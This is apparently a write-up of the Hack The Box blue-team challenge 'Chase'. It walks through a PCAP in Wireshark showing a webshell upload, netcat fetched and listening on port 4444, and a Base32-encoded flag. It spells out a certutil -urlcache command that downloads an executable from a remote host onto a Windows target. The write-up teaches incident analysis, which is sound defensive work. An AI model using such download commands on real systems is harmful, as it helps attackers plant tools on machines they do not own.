Challenge 1 of the Intro to Blue Team Track
Chase
Description: One of our web servers triggered an AV alert, but none of the sysadmins say they were logged onto it. We’ve taken a network capture before shutting the server down to take a clone of the disk. Can you take a look at the PCAP and see if anything is up?
First things first
Download the pcap file and open it in Wireshark.
We know this is a web server, so the attacker more than likely hit it over port 80.
Lets filter by HTTP to see what we can find.
We can see that the attacker utilized an upload form available on the site.
They then proceeded to upload what appears to be a webshell.
Digging deeper into this packet, we can see the command they used.
What is happening here?
- certutil is a command-line program, installed as part of certificate services. It allows you to do things like view CA configurations, verify certificates, and even encode/decode files.
However, it also has a native way to download files using the -urlcache -f flag.
-urlcache -f forces the tool to update cache based on the provided URL.
So, if we use “certutil -urlcache -split -f http:///verybadfile.exe c:\users\public\verybadfile.exe” the result is verybadfile.exe being downloaded to the C: drive on the target machine.
In this instance, the attacker is downloading netcat. Skipping down a little further, we can see netcat starts running on port 4444.
Back to the task
This is a good time to follow the TCP stream and see what we can find.
With this feature, Wireshark is simply attempting to reassemble any unencrypted plain text packets into a human readable format.
From this we immediately see that “whoami” and “ipconfig” were ran on the server.
Scrolling down, notice that the attacker attempted to download a file onto the server via powershell as well. However, they ran into some errors. From there they switched back to using certutil.
Lets take a look at the packet for this file:
If we highlight this packet, and then select Analyze > HTTP Stream then we can view the contents of the file.
Which appears to just say “Hey there!”
The flag
The text file name is kind of odd, and HTB seems to love encoding things. Let’s copy that over to CyberChef and see what happens — https://gchq.github.io/CyberChef/
After a few failed attempts with other options, I finally landed on Base32.
And there you have it, the flag has been found!
